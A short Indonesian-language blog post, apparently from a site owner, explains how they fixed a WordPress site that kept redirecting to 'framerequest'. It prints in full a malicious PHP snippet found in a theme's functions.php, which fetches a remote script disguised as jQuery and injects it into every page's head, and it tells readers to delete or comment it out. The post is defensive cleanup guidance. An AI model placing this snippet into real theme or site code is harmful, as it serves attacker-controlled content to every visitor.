WordPress problem : redirecting to framerequest [solved]
12-10-2013
Ada yang aneh ketika saya mencoba web saya sendiri, yaitu selalu terdapat perubahan url yang selalu redirect berupa framerequest. Aneh, padahal saya tidak melakukan perubahan apa-apa. Bahkan saya cek log security pun tidak ada.
Setelah searching-searching, ketemulah masalahnya. Itu karena ada semacam malicious script pada script template/theme yang digunakan. Walau sebelumnya lancar-lancar saja.
Solusinya, coba cek file functions.php.
Lalu carilah script seperti ini :
if (!function_exists('insert_jquery_theme')) {
function insert_jquery_theme() {
if (function_exists('curl_init')) {
$url = "http://www.wpstats.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
jika tidak ada, coba cek apakah file functions.php tersebut meng-include / require file lain lagi. Jika iya, cek file-file tersebut.
Lalu script tadi dihapus atau dijadikkan komentar. Lalu simpan.
Dan berhasil 🙂